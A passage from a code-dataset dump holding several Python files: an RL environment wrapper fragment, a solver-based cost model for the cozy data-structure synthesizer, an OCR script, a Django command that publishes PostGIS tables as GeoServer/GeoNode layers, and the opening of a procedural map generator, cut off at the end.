'camera_id': camera_id,\n 'frame_skip': frame_skip,\n 'frame_stack': frame_stack,\n },\n max_episode_steps=max_episode_steps\n )\n return gym.make(env_id)\n","sub_path":"noisy_bg/envs/dmc2gym/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"608276576","text":"from collections import OrderedDict\nfrom functools import total_ordering, lru_cache\nimport itertools\n\nfrom cozy.common import typechecked, partition, make_random_access\nfrom cozy.target_syntax import *\nfrom cozy.syntax_tools import BottomUpExplorer, pprint, equal, fresh_var, mk_lambda, free_vars, subst, alpha_equivalent, all_exps, cse\nfrom cozy.typecheck import is_collection\nfrom cozy.pools import RUNTIME_POOL, STATE_POOL\nfrom cozy.solver import valid, satisfiable, REAL, SolverReportedUnknown, IncrementalSolver\nfrom cozy.evaluation import eval\nfrom cozy.opts import Option\n\nassume_large_cardinalities = Option(\"assume-large-cardinalities\", int, 1000)\ninteger_cardinalities = Option(\"try-integer-cardinalities\", bool, True)\n\n# In principle these settings are supposed to improve performance; in practice,\n# they do not.\nincremental = False\nuse_indicators = False\n\nclass Cost(object):\n WORSE = \"worse\"\n BETTER = \"better\"\n UNORDERED = \"unordered\"\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n raise NotImplementedError()\n\nclass CostModel(object):\n def cost(self, e, pool):\n raise NotImplementedError()\n def is_monotonic(self):\n raise NotImplementedError()\n\n# -----------------------------------------------------------------------------\n\nclass SymbolicCost(Cost):\n @typechecked\n def __init__(self, formula : Exp, cardinalities : { Exp : EVar }):\n self.formula = formula\n self.cardinalities = cardinalities\n def __repr__(self):\n return \"SymbolicCost({!r}, {!r})\".format(self.formula, self.cardinalities)\n def __str__(self):\n return pprint(self.formula)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, SymbolicCost)\n if False:\n s = IncrementalSolver()\n v1, v2 = fresh_var(BOOL), fresh_var(BOOL)\n s.add_assumption(EAll([\n self.order_cardinalities(other, assumptions, solver),\n EEq(v1, EBinOp(self.formula, \"<=\", other.formula).with_type(BOOL)),\n EEq(v2, EBinOp(other.formula, \"<=\", self.formula).with_type(BOOL))]))\n o1 = s.valid(v1)\n o2 = s.valid(v2)\n else:\n cards = self.order_cardinalities(other, assumptions, solver)\n o1 = self.always(\"<=\", other, cards=cards)\n o2 = other.always(\"<=\", self, cards=cards)\n if o1 and not o2:\n return Cost.BETTER\n elif o2 and not o1:\n return Cost.WORSE\n else:\n return Cost.UNORDERED\n def order_cardinalities(self, other, assumptions : Exp = T, solver : IncrementalSolver = None) -> Exp:\n if solver is None:\n solver = IncrementalSolver()\n if incremental:\n solver.push()\n solver.add_assumption(assumptions)\n\n cardinalities = OrderedDict()\n for m in (self.cardinalities, other.cardinalities):\n for k, v in m.items():\n cardinalities[v] = k\n\n conds = []\n res = []\n for (v1, c1) in cardinalities.items():\n res.append(EBinOp(v1, \">=\", ZERO).with_type(BOOL))\n for (v2, c2) in cardinalities.items():\n if v1 == v2:\n continue\n if alpha_equivalent(c1, c2):\n res.append(EEq(v1, v2))\n continue\n\n if incremental and use_indicators:\n conds.append((v1, v2, fresh_var(BOOL), cardinality_le(c1, c2, as_f=True)))\n else:\n if incremental:\n le = cardinality_le(c1, c2, solver=solver)\n else:\n # print(\"CMP {}: {} / {}\".format(\"<-\" if v1 < v2 else \"->\", pprint(c1), pprint(c2)))\n le = cardinality_le(c1, c2, assumptions=assumptions, solver=solver)\n if le:\n res.append(EBinOp(v1, \"<=\", v2).with_type(BOOL))\n\n if incremental and use_indicators:\n solver.add_assumption(EAll(\n [EEq(indicator, f) for (v1, v2, indicator, f) in conds]))\n for (v1, v2, indicator, f) in conds:\n if solver.valid(indicator):\n res.append(EBinOp(v1, \"<=\", v2).with_type(BOOL))\n\n if incremental:\n solver.pop()\n\n if assume_large_cardinalities.value:\n min_cardinality = ENum(assume_large_cardinalities.value).with_type(INT)\n for cvar, exp in cardinalities.items():\n if isinstance(exp, EVar):\n res.append(EBinOp(cvar, \">\", min_cardinality).with_type(BOOL))\n\n # print(\"cards: {}\".format(pprint(EAll(res))))\n return EAll(res)\n @typechecked\n def always(self, op, other, cards : Exp, **kwargs) -> bool:\n \"\"\"\n Partial order on costs.\n \"\"\"\n if isinstance(self.formula, ENum) and isinstance(other.formula, ENum):\n return eval(EBinOp(self.formula, op, other.formula).with_type(BOOL), env={})\n f = EImplies(cards, EBinOp(self.formula, op, other.formula).with_type(BOOL))\n if integer_cardinalities.value:\n try:\n return valid(f, logic=\"QF_LIA\", timeout=1, **kwargs)\n except SolverReportedUnknown:\n # If we accidentally made an unsolveable integer arithmetic formula,\n # then try again with real numbers. This will admit some models that\n # are not possible (since bags must have integer cardinalities), but\n # returning false is always a safe move here, so it's fine.\n print(\"Warning: not able to solve {}\".format(pprint(f)))\n f = subst(f, { v.id : EVar(v.id).with_type(REAL) for v in free_vars(cards) })\n # This timeout is dangerous! Sufficiently complex specifications\n # will cause this to timeout _every_time_, meaning we never make\n # progress.\n # However, this timeout helps ensure liveness: the Python process\n # never gets deadlocked waiting for Z3. In the Distant Future it\n # would be nice to move away from Z3Py and invoke Z3 as a subprocess\n # instead. That would allow the Python process to break out if it is\n # asked to stop while Z3 is running. It would also give us added\n # protection against Z3 segfaults, which have been observed in the\n # wild from time to time.\n timeout = 60\n try:\n return valid(f, logic=\"QF_NRA\", timeout=timeout, **kwargs)\n except SolverReportedUnknown:\n print(\"Giving up!\")\n return False\n\nclass PlainCost(Cost):\n def __init__(self, n : int):\n self.n = n\n def __repr__(self):\n return \"PlainCost({!r})\".format(self.n)\n def __str__(self):\n return str(self.n)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, PlainCost)\n if self.n < other.n:\n return Cost.BETTER\n elif self.n > other.n:\n return Cost.WORSE\n else:\n return Cost.UNORDERED\n\nfrom contextlib import contextmanager\nimport datetime\nimport sys\n@contextmanager\ndef timed(name=\"anon\"):\n # print(\"--tick [{}]... \".format(name), end=\"\")\n sys.stdout.flush()\n st = datetime.datetime.now()\n yield\n duration = datetime.datetime.now() - st\n # print(\"tock [{}s]\".format(duration.total_seconds()))\n\nclass CompositeCost(Cost):\n def __init__(self, *costs):\n self.costs = tuple(costs)\n def __repr__(self):\n return \"CompositeCost({})\".format(\", \".join(repr(c) for c in self.costs))\n def __str__(self):\n return \"; \".join(str(c) for c in self.costs)\n def compare_to(self, other, assumptions : Exp = T, solver : IncrementalSolver = None):\n assert isinstance(other, CompositeCost)\n assert len(self.costs) == len(other.costs)\n i = 0\n for c1, c2 in zip(self.costs, other.costs):\n with timed(type(c1).__name__ + \"[{}]\".format(i)):\n order = c1.compare_to(c2, assumptions, solver)\n i += 1\n if order != Cost.UNORDERED:\n return order\n return Cost.UNORDERED\n\n# -----------------------------------------------------------------------------\n\nclass CompositeCostModel(CostModel):\n def __repr__(self):\n return \"CompositeCostModel()\"\n def is_monotonic(self):\n return False\n def cost(self, e, pool):\n cards = OrderedDict()\n # for v in free_vars(e):\n # if is_collection(v.type):\n # cardinality(v, cards)\n if pool == STATE_POOL:\n return CompositeCost(\n sizeof(e, cards),\n ast_size(e))\n else:\n assert pool == RUNTIME_POOL\n return CompositeCost(\n asymptotic_runtime(e),\n storage_size(e, cards),\n precise_runtime(e),\n ast_size(e))\n\ndef maybe_inline(e, f):\n if isinstance(e, ENum) or isinstance(e, EVar):\n return f(e)\n v = fresh_var(e.type, omit=free_vars(f(T)))\n body = f(v)\n return ELet(e, ELambda(v, body)).with_type(body.type)\n\ndef EMax(es):\n es = make_random_access(es)\n assert es\n assert all(isinstance(e, Exp) for e in es), es\n res = es[0]\n t = res.type\n fvs = set(v.id for v in free_vars(res))\n for i in range(1, len(es)):\n res = maybe_inline(res, lambda v1:\n maybe_inline(es[i], lambda v2:\n ECond(EGt(v1, v2), v1, v2).with_type(t)))\n # v1 = fresh_var(res.type, omit=fvs)\n # fvs.add(v1.id)\n # v2 = fresh_var(res.type, omit=fvs)\n # fvs.add(v2.id)\n # fvs |= set(v.id for v in free_vars(es[i]))\n # res = ELet(res, ELambda(v1,\n # ELet(es[i], ELambda(v2,\n # ECond(EGt(v1, v2), v1, v2).with_type(res.type))).with_type(res.type))).with_type(res.type)\n # res = ECond(EGt(res, es[i]), res, es[i]).with_type(res.type)\n return res\n\ndef asymptotic_runtime(e):\n class V(BottomUpExplorer):\n def __init__(self):\n super().__init__()\n self.cardinalities = { }\n def EBinOp(self, e1, op, e2):\n if isinstance(e1, list): e1 = EMax([ONE] + e1)\n if isinstance(e2, list): e2 = EMax([ONE] + e2)\n if op == \"*\":\n if e1 == ENum(1): return e2\n if e2 == ENum(1): return e1\n e = EBinOp(e1, op, e2).with_type(e1.type)\n if isinstance(e1, ENum) and isinstance(e2, ENum):\n return ENum(eval(e, {})).with_type(e1.type)\n return e\n def cardinality(self, e : Exp, **kwargs) -> Exp:\n return cardinality(e, self.cardinalities, **kwargs)\n def combine(self, costs):\n res = []\n q = list(costs)\n while q:\n c = q.pop()\n if isinstance(c, ENum):\n continue\n elif isinstance(c, Exp):\n res.append(c)\n else:\n assert isinstance(c, list) or isinstance(c, tuple), repr(c)\n q.extend(c)\n return res\n # return EMax([ONE] + res)\n def visit_EStateVar(self, e):\n return self.combine([ONE])\n def visit_EUnaryOp(self, e):\n costs = [ONE, self.visit(e.e)]\n if e.op in (UOp.Sum, UOp.Distinct, UOp.AreUnique, UOp.All, UOp.Any, UOp.Length):\n costs.append(self.cardinality(e.e))\n return self.combine(costs)\n def visit_EBinOp(self, e):\n c1 = self.visit(e.e1)\n c2 = self.visit(e.e2)\n costs = [ONE, c1, c2]\n if e.op == BOp.In:\n costs.append(self.cardinality(e.e2))\n elif e.op == \"==\" and is_collection(e.e1.type):\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n elif e.op == \"-\" and is_collection(e.type):\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n return self.combine(costs)\n def visit_ELambda(self, e):\n # avoid name collisions with fresh_var\n return self.visit(e.apply_to(fresh_var(e.arg.type)))\n def visit_EMakeMap2(self, e):\n return self.combine([self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.value)).with_type(INT)])\n def visit_EFilter(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.p)).with_type(INT)))\n def visit_EFlatMap(self, e):\n return self.visit(EMap(e.e, e.f))\n def visit_EMap(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMin(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMax(self, e):\n return self.combine((ONE, self.visit(e.e), self.EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EDropFront(self, e):\n return self.combine((ONE, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def visit_EDropBack(self, e):\n return self.combine((ONE, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def join(self, x, child_costs):\n if isinstance(x, list) or isinstance(x, tuple):\n return self.combine(child_costs)\n if not isinstance(x, Exp):\n return self.combine([ZERO])\n return self.combine(itertools.chain((ONE,), child_costs))\n vis = V()\n f = EMax([ONE] + vis.visit(e))\n # f = cse(f)\n return SymbolicCost(f, vis.cardinalities)\n\ndef sizeof(e, cardinalities):\n terms = [ONE]\n if is_collection(e.type):\n terms.append(cardinality(e, cardinalities))\n elif isinstance(e.type, TMap):\n ks = EMapKeys(e).with_type(TBag(e.type.k))\n terms.append(cardinality(ks, cardinalities))\n if is_collection(e.type.v):\n vals = EFlatMap(ks, mk_lambda(e.type.k, lambda k: EMapGet(e, k).with_type(e.type.v))).with_type(e.type.v)\n terms.append(cardinality(vals, cardinalities))\n return SymbolicCost(ESum(terms), cardinalities)\n\ndef storage_size(e, cardinalities):\n sizes = []\n for x in all_exps(e):\n if isinstance(x, EStateVar):\n sz_cost = sizeof(x.e, cardinalities)\n sizes.append(sz_cost.formula)\n return SymbolicCost(ESum(sizes), cardinalities)\n\n# Some kinds of expressions have a massive penalty associated with them if they\n# appear at runtime.\nEXTREME_COST = ENum(1000).with_type(INT)\nMILD_PENALTY = ENum( 10).with_type(INT)\nTWO = ENum( 2).with_type(INT)\n\ndef precise_runtime(e):\n class V(BottomUpExplorer):\n def __init__(self):\n super().__init__()\n self.cardinalities = { }\n def cardinality(self, e : Exp, **kwargs) -> Exp:\n return cardinality(e, self.cardinalities, **kwargs)\n def visit_EStateVar(self, e):\n return ONE\n def visit_EUnaryOp(self, e):\n costs = [ONE, self.visit(e.e)]\n if e.op in (UOp.Sum, UOp.Distinct, UOp.AreUnique, UOp.All, UOp.Any, UOp.Length):\n costs.append(self.cardinality(e.e))\n return ESum(costs)\n def visit_EBinOp(self, e):\n c1 = self.visit(e.e1)\n c2 = self.visit(e.e2)\n costs = [ONE, c1, c2]\n if e.op == BOp.In:\n costs.append(self.cardinality(e.e2))\n elif e.op == \"==\" and is_collection(e.e1.type):\n costs.append(EXTREME_COST)\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n elif e.op == \"-\" and is_collection(e.type):\n costs.append(EXTREME_COST)\n costs.append(self.cardinality(e.e1))\n costs.append(self.cardinality(e.e2))\n return ESum(costs)\n def visit_ELambda(self, e):\n # avoid name collisions with fresh_var\n return self.visit(e.apply_to(fresh_var(e.arg.type)))\n def visit_EMapGet(self, e):\n # mild penalty here because we want \"x.f\" < \"map.get(x)\"\n return ESum((MILD_PENALTY, self.visit(e.map), self.visit(e.key)))\n def visit_EMakeMap2(self, e):\n return ESum((EXTREME_COST, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.value)).with_type(INT)))\n def visit_EFilter(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.p)).with_type(INT)))\n def visit_EFlatMap(self, e):\n return self.visit(EMap(e.e, e.f))\n def visit_EMap(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMin(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EArgMax(self, e):\n return ESum((TWO, self.visit(e.e), EBinOp(self.cardinality(e.e, plus_one=True), \"*\", self.visit(e.f)).with_type(INT)))\n def visit_EDropFront(self, e):\n return ESum((MILD_PENALTY, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def visit_EDropBack(self, e):\n return ESum((MILD_PENALTY, self.visit(e.e), self.cardinality(e.e, plus_one=True).with_type(INT)))\n def join(self, x, child_costs):\n if isinstance(x, list) or isinstance(x, tuple):\n return ESum(child_costs)\n if not isinstance(x, Exp):\n return ZERO\n return ESum(itertools.chain((ONE,), child_costs))\n vis = V()\n f = vis.visit(e)\n return SymbolicCost(f, vis.cardinalities)\n\ndef ast_size(e):\n return PlainCost(e.size())\n\n# -----------------------------------------------------------------------------\n\n# @typechecked\ndef cardinality(e : Exp, cache : { Exp : EVar }, plus_one=False) -> Exp:\n assert is_collection(e.type)\n # if plus_one:\n # return ESum((self.cardinality(e, plus_one=False), ONE))\n if isinstance(e, EEmptyList):\n return ZERO\n if isinstance(e, ESingleton):\n return ONE\n if isinstance(e, EBinOp) and e.op == \"+\":\n return ESum((cardinality(e.e1, cache), cardinality(e.e2, cache)))\n if isinstance(e, EMap):\n return cardinality(e.e, cache)\n if isinstance(e, EStateVar):\n return cardinality(e.e, cache)\n prev = cache.get(e)\n if prev is not None:\n return prev\n else:\n v = fresh_var(INT)\n cache[e] = v\n # if isinstance(e, EFilter):\n # cc = self.cardinality(e.e)\n # self.assumptions.append(EBinOp(v, \"<=\", cc).with_type(BOOL))\n # # heuristic: (xs) large implies (filter_p xs) large\n # self.assumptions.append(EBinOp(\n # EBinOp(v, \"*\", ENum(5).with_type(INT)).with_type(INT), \">=\",\n # EBinOp(cc, \"*\", ENum(4).with_type(INT)).with_type(INT)).with_type(BOOL))\n # if isinstance(e, EUnaryOp) and e.op == UOp.Distinct:\n # cc = self.cardinality(e.e)\n # self.assumptions.append(EBinOp(v, \"<=\", cc).with_type(BOOL))\n # # self.assumptions.append(EImplies(EGt(cc, ZERO), EGt(v, ZERO)))\n # # heuristic: (xs) large implies (distinct xs) large\n # self.assumptions.append(EBinOp(\n # EBinOp(v, \"*\", ENum(5).with_type(INT)).with_type(INT), \">=\",\n # EBinOp(cc, \"*\", ENum(4).with_type(INT)).with_type(INT)).with_type(BOOL))\n # if isinstance(e, EBinOp) and e.op == \"-\":\n # self.assumptions.append(EBinOp(v, \"<=\", self.cardinality(e.e1)).with_type(BOOL))\n # if isinstance(e, ECond):\n # self.assumptions.append(EAny([EEq(v, self.cardinality(e.then_branch)), EEq(v, self.cardinality(e.else_branch))]))\n return v\n\n@lru_cache(maxsize=2**16)\n# @typechecked\ndef cardinality_le(c1 : Exp, c2 : Exp, assumptions : Exp = T, as_f : bool = False, solver : IncrementalSolver = None) -> bool:\n \"\"\"\n Is |c1| <= |c2|?\n Yes, iff there are no v such that v occurs more times in c2 than in c1.\n \"\"\"\n if True:\n f = EBinOp(ELen(c1), \"<=\", ELen(c2)).with_type(BOOL)\n else:\n assert c1.type == c2.type\n # Oh heck.\n # This isn't actually very smart if:\n # x = [y]\n # a = Filter (!= y) b\n # This method can't prove that |x| <= |a|, even though |a| is likely huge\n v = fresh_var(c1.type.t)\n f = EBinOp(ECountIn(v, c1), \"<=\", ECountIn(v, c2)).with_type(BOOL)\n if as_f:\n return f\n res = solver.valid(EImplies(assumptions, f)) if solver else valid(EImplies(assumptions, f))\n # assert res == valid(EImplies(assumptions, f))\n return res\n\ndef debug_comparison(e1, c1, e2, c2, assumptions : Exp = T):\n print(\"-\" * 20)\n print(\"comparing costs...\")\n print(\" e1 = {}\".format(pprint(e1)))\n print(\" c1 = {}\".format(c1))\n print(\" e2 = {}\".format(pprint(e2)))\n print(\" c2 = {}\".format(c2))\n print(\" c1 compare_to c2 = {}\".format(c1.compare_to(c2, assumptions=assumptions)))\n print(\" c2 compare_to c1 = {}\".format(c2.compare_to(c1, assumptions=assumptions)))\n for c1, c2 in zip(c1.costs, c2.costs):\n if not isinstance(c1, SymbolicCost):\n continue\n print(\"-\" * 10)\n print(\"comparing {} and {}\".format(c1, c2))\n print(\" c1 compare_to c2 = {}\".format(c1.compare_to(c2, assumptions=assumptions)))\n print(\" c2 compare_to c1 = {}\".format(c2.compare_to(c1, assumptions=assumptions)))\n print(\"variable meanings...\")\n for e, v in itertools.chain(c1.cardinalities.items(), c2.cardinalities.items()):\n print(\" {v} = len {e}\".format(v=pprint(v), e=pprint(e)))\n print(\"joint orderings...\")\n cards = c1.order_cardinalities(c2, assumptions=assumptions)\n print(\" {}\".format(pprint(cards)))\n for op in (\"<=\", \"<\", \">\", \">=\"):\n print(\"c1 always {} c2?\".format(op))\n x = []\n res = c1.always(op, c2, cards=cards, model_callback=lambda m: x.append(m))\n if res:\n print(\" YES\")\n elif not x:\n print(\" NO (no model!?)\")\n else:\n print(\" NO: {}\".format(x[0]))\n print(\" c1 = {}\".format(eval(c1.formula, env=x[0])))\n print(\" c2 = {}\".format(eval(c2.formula, env=x[0])))\n\ndef break_sum(e):\n if isinstance(e, EBinOp) and e.op == \"+\":\n yield from break_sum(e.e1)\n yield from break_sum(e.e2)\n else:\n yield e\n\ndef ESum(es):\n es = [e for x in es for e in break_sum(x) if e != ZERO]\n if not es:\n return ZERO\n nums, nonnums = partition(es, lambda e: isinstance(e, ENum))\n es = nonnums\n if nums:\n es.append(ENum(sum(n.val for n in nums)).with_type(INT))\n return build_balanced_tree(INT, \"+\", es)\n","sub_path":"cozy/cost_model.py","file_name":"cost_model.py","file_ext":"py","file_size_in_byte":23461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"93108160","text":"import cv2\nimport numpy as np\nimport pytesseract\nfrom PIL import Image\n\n\ndef hangulFilePathImageRead(filePath):\n stream = open(filePath.encode(\"utf-8\"), \"rb\")\n bytes = bytearray(stream.read())\n numpyArray = np.asarray(bytes, dtype=np.uint8)\n\n return cv2.imdecode(numpyArray, cv2.IMREAD_UNCHANGED)\n\n# filepath = '공부하기싫다.jpg'\n# filepath = hangulFilePathImageRead(filepath)\n\n# filepath = cv2.cvtColor(filepath,cv2.COLOR_BGR2GRAY)\n# ret, file_result = cv2.threshold(filepath,127,255,cv2.THRESH_BINARY)\n\n# cv2.imshow('imageshow',filepath)\n# cv2.imshow('imageshow',file_result)\n# cv2.waitKey(0) # 이미지가 show 된 상태로 wait\n# cv2.destroyAllWindows()\nimg = cv2.imread('toon3.jpg',cv2.THRESH_BINARY)\ncv2.imshow('img',img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n# img = Image.open('test.png')\n# re_img = img.resize((1024,1024))\n# re_img.save('toon2.jpg')\n# re_img\npytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract.exe'\n\nprint(pytesseract.image_to_string(img,lang='kor'))\n\n","sub_path":"image/text/text_out.py","file_name":"text_out.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"388686597","text":"# -*- coding: utf8 -*-\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.conf import settings\n\nfrom optparse import OptionParser\nfrom optparse import make_option\nfrom geoserver.catalog import Catalog\nfrom uuid import uuid4\nfrom decimal import *\nfrom django.core.management import call_command\nimport time\nimport psycopg2\n\nfrom geonode.layers.models import Layer\n\nclass Command(BaseCommand):\n\n args = 'params'\n help = 'Collect layer from Database'\n geoserver_url = settings.OGC_SERVER['default']['LOCATION']\n geoserver_rest_url = geoserver_url + 'rest'\n urb = {\n \"capa\":\"Parcelles\",\n \"toli\":\"cadastre_ln_toponymiques\",\n \"canu\":\"cadastre_pt_num\",\n \"cabu\":\"Batiments\",\n \"gept\":\"cadastre_points_generaux\",\n \"gepn\":\"cadastre_pol_gen\",\n \"inpt\":\"point\",\n \"geli\":\"cadastre_ln_generales\",\n \"inli\":\"cadastre_ln_informations\",\n \"topt\":\"point\",\n }\n\n option_list = BaseCommand.option_list + (\n make_option(\"-c\", \"--geoserveradmin\",\n action='store',\n type=\"string\",\n dest='geoserveradmin',\n default=\"admin\",\n help=\"Nom utilisateur Geoserver = [default: %default]\"),\n )+ (\n make_option(\"-p\", \"--gpw\",\n action='store',\n type=\"string\",\n dest='gpw',\n default=\"\",\n help=\"Geoserver password [default: %default]\"),\n )+ (\n make_option(\"-u\", \"--dbadr\",\n action='store',\n type=\"string\",\n dest='dbadr',\n default=\"\",\n help=\"Adresse base de données [default: %default]\"),\n )+ (\n make_option(\"-m\", \"--dbport\",\n action='store',\n type=\"string\",\n dest='dbport',\n default=\"5432\",\n help=\"Port base de données = [default: %default]\"),\n )+ (\n make_option(\"-g\", \"--postuser\",\n action='store',\n type=\"string\",\n dest='postuser',\n default=\"ro_user\",\n help=\"Utilisateur base de données = [default: %default]\"),\n )+ (\n make_option(\"-r\", \"--ropw\",\n action='store',\n type=\"string\",\n dest='ropw',\n default=\"\",\n help=\"Password base de données [default: %default]\"),\n )+ (\n make_option(\"-d\", \"--database\",\n action='store',\n type=\"string\",\n dest='database',\n default=\"urbangis\",\n help=\"Nom base de données = [default: %default]\"),\n )+ (\n make_option(\"-a\", \"--alias\",\n action='store',\n type=\"string\",\n dest='alias',\n default=\"\",\n help=\"Workspace [default: %default]\"),\n )+ (\n make_option(\"-z\", \"--uri\",\n action='store',\n type=\"string\",\n dest='uri',\n default=\"imio.be\",\n help=\"Uri espace de nommage = [default: %default]\"),\n )+ (\n make_option(\"-n\", \"--groupname\",\n action='store',\n type=\"string\",\n dest='groupname',\n default=\"\",\n help=\"Groupe qui pourra voir les couches [default: %default]\"),\n )\n\n def createDataStore(self, options):\n try:\n cat = Catalog(self.geoserver_rest_url, options['geoserveradmin'], options['gpw'])\n #create datastore for URB schema\n ws = cat.create_workspace(options['alias'],options['uri'])\n\n try:\n ds = cat.create_datastore(options['alias'], ws)\n ds.connection_parameters.update(\n host=options['dbadr'],\n port=options['dbport'],\n database=options['database'],\n user=options['postuser'],\n passwd=options['ropw'],\n dbtype=\"postgis\")\n cat.save(ds)\n except Exception as e:\n print(str(e))\n raise Exception('Erreur de connexion au Geoserver lors de la création du DataStore')\n except Exception as e:\n raise Exception(str(e))\n return ws.name , ds.name, ds.resource_type\n\n def addLayersToGeoserver(self, options):\n cat = Catalog(self.geoserver_rest_url, options['geoserveradmin'], options['gpw'])\n\n try:\n ds = cat.get_store(options['alias'])\n except Exception as e:\n raise Exception('Erreur de récupération du workspace')\n\n layers = []\n try:\n #connect to tables and create layers and correct urban styles\n for table in self.urb:\n try:\n style = self.urb[table]\n ft = cat.publish_featuretype(table, ds, 'EPSG:31370', srs='EPSG:31370')\n gs_style = cat.get_style(style)\n cat.save(ft)\n res_name = ft.dirty['name']\n res_title = options['alias']+\"_\"+table\n cat.save(ft)\n layer_name = ds.workspace.name + ':' + res_name\n new_layer = cat.get_layer(layer_name)\n new_layer.default_style = gs_style\n cat.save(new_layer)\n layers.append({ 'res_name' : res_name, 'res_title' : res_title })\n except Exception as e:\n # a verifier une fois un possesion des styles\n print(str(e))\n\n except Exception as e:\n print(str(e))\n raise Exception('Erreur lors de la récupération des couches depuis Geoserver')\n\n return layers\n\n def addLayersToGeonode(self, options, ws_name, ds_name, ds_resource_type, layers):\n try:\n for l in layers:\n created = False\n print(\"Add layer %s in geonode\" % (ws_name + ':' + l['res_name']))\n layer, created = Layer.objects.get_or_create(typename=ws_name + ':' + l['res_name'], defaults={\n \"name\" : l['res_name'],\n \"workspace\": ws_name,\n \"store\": ds_name,\n \"storeType\": ds_resource_type,\n \"typename\": \"%s:%s\" % (ws_name.encode('utf-8'), l['res_name'].encode('utf-8')),\n \"title\": l['res_title'] or 'No title provided',\n \"abstract\": 'No abstract provided',\n #\"owner\": owner,\n \"uuid\": str(uuid4())\n #\"bbox_x0\": Decimal(ft.latLonBoundingBox.miny),\n #\"bbox_x1\": Decimal(ft.latLonBoundingBox.maxy),\n #\"bbox_y0\": Decimal(ft.latLonBoundingBox.minx),\n #\"bbox_y1\": Decimal(ft.latLonBoundingBox.maxx)\n })\n\n if created:\n grName = unicode(options['groupname'])\n print(\"Couche ok, ajout de la couche au groupe %s\" % (grName))\n perm = {\n u'users': {\n u'AnonymousUser': [u'view_resourcebase'] },\n u'groups': {\n grName:[u'view_resourcebase',u'download_resourcebase'] }\n }\n try:\n layer.set_permissions(perm)\n layer.save()\n except Exception as e:\n print(str(e))\n raise Exception('Problème survenu lors de l\\'application des permissions aux couches')\n else:\n raise Exception('Erreur lors de l\\'importation. Le layer'+ws_name + ':' + l['res_name']+'existe déjà')\n\n except Exception as e:\n print(\"Erreur ***\")\n print(str(e))\n raise Exception('Erreur lors de l\\'importation des couches depuis Geoserver',e)\n\n def handle(self, *args, **options):\n if self.verifParams(options):\n try:\n conn = psycopg2.connect(\"dbname='\" + options['database'] + \"' user='\" + options['postuser'] + \"' host='\" + options['dbadr'] + \"' password='\" + options['ropw'] + \"' port='\" + options['dbport'] + \"'\")\n conn.close()\n except psycopg2.Error as e:\n if 'could not connect to server: Connection refused' in e.message:\n raise Exception('La connexion au serveur n\\'est pas valide. Vérifier l\\'adresse et le port')\n if 'FATAL: database ' in e.message:\n raise Exception('La nom de la basse de données n\\'est pas correcte')\n if 'FATAL: password authentication failed ' in e.message:\n raise Exception('Erreur de login/password')\n if 'could not translate host name' in e.message:\n raise Exception('Erreur sur l\\'adresse de la base de données')\n raise Exception('Erreur de connection à la base de données')\n\n ws_name , ds_name, ds_resource_type = self.createDataStore(options)\n layers = self.addLayersToGeoserver(options)\n self.addLayersToGeonode(options,ws_name, ds_name,ds_resource_type, layers)\n\n else:\n raise Exception('Des paramètres non pas été définit')\n\n def verifParams(self, options):\n if(options['gpw'] is None or options['gpw'] is '' or\n options['dbadr'] is None or options['dbadr'] is '' or\n options['ropw'] is None or options['ropw'] is '' or\n options['alias'] is None or options['alias'] is '' or\n options['groupname'] is None or options['groupname'] is ''):\n print('Some parameter was not define')\n return False\n else:\n return True\n","sub_path":"adminimio/management/commands/addurb.py","file_name":"addurb.py","file_ext":"py","file_size_in_byte":9554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"604042596","text":"\"\"\"\n map_procedure - Creates a map by a certain algorithm\n using a seed number of nodes to traverse.\n\n Contains just one method that will return a 2d list map.\n @author Dylan McLarty\n\"\"\"\n\nimport random\nimport math\nfrom collections import deque\nimport TreasureAlgorithms\n\nmap_proc = []\n\n\ndef map_procedure(size, num_nodes):\n global map_proc\n start_pos = [math.floor(size / 2), math.floor(size / 2)]\n for x in range(size):\n map_proc.append(['#' for y in range(size)])\n\n def snake_proc(init_pos, node_list):\n global map_proc\n if len(node_list) > 0:\n node = node_list.popleft()\n x = abs(node[0] - init_pos[0])\n y = abs(node[0] - init_pos[0])\n if random.randint(1, 9) > 5:\n if 0 < x < 10:\n 